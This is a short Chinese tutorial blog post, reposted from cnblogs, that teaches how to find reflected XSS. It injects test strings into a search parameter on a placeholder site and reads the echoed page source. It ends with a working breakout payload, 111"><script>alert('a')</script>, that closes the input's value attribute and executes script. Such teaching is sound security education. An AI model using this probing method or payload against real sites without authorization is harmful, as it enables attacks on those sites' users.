xss学习之查找xss（一）

时间：2015-02-10 22:53:45 阅读：152 评论：0 收藏：0 [点我收藏+]

标签：

从本章开始学习xss

如何查找xss：

拿到一个网站之后，随便找一个页面测试下

http://xss.com/product/product_searchProducts.action?productName=111

查看页面源代码为：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);"  value="111"/>

添加一些变形，随便写（这里主要是看页面时如何构造语句的）：

把111变为： 111‘</a

http://xss.com/product/product_searchProducts.action?productName=111‘</a

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);"  value="111‘</a"/>

可以看到111前面有个" 在/a后面还有” 这个是系统自动加的，然后系统自动增加了 />

构造xss为：首先闭合掉最开头的< 需要提交参数的时候先使用> 闭合掉

尝试提交 111><script>alert(‘a‘)</script>

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);"  value="111><script>alert(‘a‘)</script>"/>

可以看到在</script>之后自动添加了"/>

这个”是跟提交数据一起的，也需要在一开始就闭合

尝试： 111"><script>alert(‘a‘)</script>

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);"  value="111"><script>alert(‘a‘)</script>"/>

此时前面该闭合的都已经闭合了，最后留下了xss代码执行成功，会弹出一个对话框，内容为“a”

xss学习之查找xss（一）

标签：

原文地址：http://www.cnblogs.com/luyg24/p/4284954.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行